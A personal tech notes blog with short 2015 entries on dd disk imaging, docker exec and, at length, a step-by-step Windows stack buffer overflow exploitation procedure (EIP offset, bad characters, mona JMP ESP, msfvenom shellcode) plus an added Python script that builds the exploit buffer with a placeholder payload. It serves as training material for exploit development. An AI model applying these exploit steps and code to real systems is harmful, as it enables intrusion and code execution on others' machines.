Wednesday, July 22, 2015
Windows Infections without tools
http://909research.com/find-a-windows-infection-quickly-without-tools/
Tuesday, July 21, 2015
dd
sudo dd if=/dev/sdc conv=sync,noerror of=/home/backup.img bs=64K
conv=noerror keeps dd reading past unreadable sectors instead of aborting, and conv=sync pads each short read to a full 64K block with zeros so that everything after a bad sector keeps its original offset in the image. The two options only make sense together. Side effect: the image is rounded up to a whole number of 64K blocks, so it can be slightly larger than the device it was taken from.
You will also need to use those options for the restore (note the target here is a different device, /dev/sdb; check it twice, dd overwrites it without asking):
sudo dd if=/home/backup.img of=/dev/sdb conv=sync,noerror bs=64K
Wednesday, July 8, 2015
Start another shell session on the same container in Docker
docker exec -it <container id or name> bash
If the image has no bash, use sh instead.
Thursday, July 2, 2015
Refresher buffer overflow
1. Fuzz the target input until it crashes, and note the length that caused the crash.
2. Attach Immunity Debugger to the target and reproduce the crash.
3. Confirm that you control the EIP register (it should contain your filler bytes, e.g. 41414141 for a buffer of "A"s).
4. Generate a unique pattern of the crash length: /usr/share/metasploit-framework/tools/pattern_create.rb [length] (newer Metasploit versions take -l [length]).
5. Send the pattern and read the value left in EIP at the crash.
6. Look that value up: /usr/share/metasploit-framework/tools/pattern_offset.rb [value], passing the EIP value as shown in the debugger (the tool accounts for little-endian byte order). The result is the offset: the number of bytes before the four that land in EIP.
7. Rebuild the buffer as offset bytes of padding, four marker bytes (e.g. "BBBB") and filler up to the crash length, and confirm EIP now reads 42424242.
8. Find the bad characters: bytes the application mangles or truncates (0x00 is almost always one). Send every byte 0x01-0xff after the EIP overwrite, compare the stack contents in the debugger with what you sent, remove each byte that breaks the sequence and repeat until the whole range arrives intact.
9. !mona modules in Immunity Debugger lists the loaded modules. Pick one without protections (Rebase, SafeSEH, ASLR and NXCompat all False) whose address range contains no null bytes or other bad characters.
10. Find the opcode for JMP ESP with /usr/share/metasploit-framework/tools/nasm_shell.rb:
nasm > jmp esp
00000000 FFE4 jmp esp
11. Search that module for the opcode with mona: !mona find -s "\xff\xe4" -m slmfc.dll
12. Pick a hit whose address contains no bad characters, and double-click it to check that the bytes at that address really are FF E4.
13. Put that address in the buffer in place of the four bytes that overwrite EIP, written little-endian (least significant byte first).
14. To validate, set a breakpoint on the JMP ESP address and run the exploit again: execution should stop on the breakpoint, with ESP pointing into your buffer just past the return address.
15. Append the shellcode after the return address, generated with the bad characters excluded (e.g. msfvenom -b '\x00...'), usually preceded by a short NOP sled, so the JMP ESP lands in it and runs it.
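The exploit-side part of the procedure above (steps 4 to 8, 13 and 15) as an added example in Python. This is not code from the original post or from Metasploit: it is a small stand-in for pattern_create.rb and pattern_offset.rb plus a bad-character check and the buffer assembly. The EIP value 39694438, the JMP ESP address 0x5f3b12e4, the bad-character list and the int3 placeholder payload are constructed or hypothetical; in a real run they come from the debugger, mona and msfvenom.

```python
import struct
from string import ascii_lowercase, ascii_uppercase, digits, hexdigits

# Added example, not code from the original post or from Metasploit: a Python
# equivalent of pattern_create.rb / pattern_offset.rb, a bad-character check and
# the padding | return address | NOP sled | shellcode buffer assembly.
# All concrete values in the demo at the bottom are constructed or hypothetical.

MAX_PATTERN = 26 * 26 * 10 * 3  # longest unique pattern the Aa0 scheme can produce


def pattern_create(length):
    """Same cyclic pattern as pattern_create.rb: Aa0Aa1...Aa9Ab0... cut to LENGTH."""
    if not 0 < length <= MAX_PATTERN:
        raise ValueError(f"length must be 1..{MAX_PATTERN}")
    full = "".join(u + l + d for u in ascii_uppercase for l in ascii_lowercase for d in digits)
    return full[:length]


def pattern_offset(value, length):
    """Equivalent of pattern_offset.rb: VALUE is either the 4 characters that
    landed in EIP or the 8-hex-digit EIP value as the debugger shows it.
    EIP is little-endian, so a hex value is byte-reversed before the search."""
    v = value[2:] if value.lower().startswith("0x") else value
    if len(v) == 8 and all(c in hexdigits for c in v):
        needle = bytes.fromhex(v)[::-1].decode("latin-1")
    else:
        needle = v
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError(f"{value!r} not found in a pattern of length {length}")
    return idx  # number of bytes before the four that overwrite EIP


def bad_chars_in(data, badchars):
    """Bytes from BADCHARS that occur in DATA (empty list means DATA is clean)."""
    return sorted(set(data) & set(badchars))


def build_exploit(offset, jmp_esp, shellcode, badchars, total_len, nop_sled=16):
    """Assemble OFFSET bytes of padding | JMP ESP address (little-endian) |
    NOP sled | SHELLCODE | filler up to TOTAL_LEN (the length that crashed).
    Refuses a return address or payload that contains a bad character."""
    ret = struct.pack("<I", jmp_esp)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        hits = bad_chars_in(blob, badchars)
        if hits:
            raise ValueError(f"{name} contains bad chars: {[hex(b) for b in hits]}")
    buf = b"A" * offset + ret + b"\x90" * nop_sled + shellcode
    if len(buf) > total_len:
        raise ValueError("payload does not fit in the crash length")
    return buf + b"C" * (total_len - len(buf))


if __name__ == "__main__":
    # Constructed walk-through: EIP read as 39694438 after sending a 3000-byte pattern.
    off = pattern_offset("39694438", 3000)  # the stack held "8Di9", offset 2606
    JMP_ESP = 0x5f3b12e4                    # hypothetical hit from !mona find
    BADCHARS = b"\x00\x0a\x0d"              # assumed bad characters for this target
    PAYLOAD = b"\xcc" * 4                   # int3 placeholder; real payload: msfvenom -b
    buf = build_exploit(off, JMP_ESP, PAYLOAD, BADCHARS, total_len=3500)
    print(f"offset={off} buffer={len(buf)} bytes ret={buf[off:off + 4].hex()}")
```

Sending a buffer of four 0xCC bytes as the "payload" is a useful first check: if the JMP ESP is right, the debugger breaks on the int3 at ESP before any real shellcode is involved. Note that the same EIP value is reported differently by the two routes: the debugger shows 39694438, but the bytes actually on the stack were "8Di9", which is why the hex form is reversed before searching.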